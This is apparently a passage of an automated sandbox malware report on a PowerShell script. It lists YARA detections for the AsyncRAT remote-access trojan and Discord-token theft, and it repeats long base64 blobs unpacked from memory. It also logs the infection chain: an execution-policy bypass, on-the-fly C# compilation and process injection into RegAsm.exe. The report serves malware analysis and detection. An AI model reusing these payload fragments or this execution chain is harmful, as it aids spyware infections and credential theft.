            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219ab9a4e58.4.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.219c3ac0000.12.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.219acd868f0.1.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.219acd986b0.3.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.219ab9a4e58.4.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 0.2.powershell.exe.219c3ad0000.13.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 0.2.powershell.exe.219ace4d6e0.7.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 0.2.powershell.exe.219c3ac0000.12.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 0.2.powershell.exe.219acd868f0.1.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 0.2.powershell.exe.219acd986b0.3.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: ewvozk4a.dll.3.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@9/13@0/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\7n5rJCiEX08cdKRQsT6vxkbuaZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\FkwbxYcgg1G0FnF/TAjQzi9jUa9qcKKioTum8hnjwFlv/+1VfkEHx8BfkllXkWd9Y+CD9XIOkxhhblHpQPtD1w==
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhsqjux5.ikr.ps1Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: vfrcxq.ps1ReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
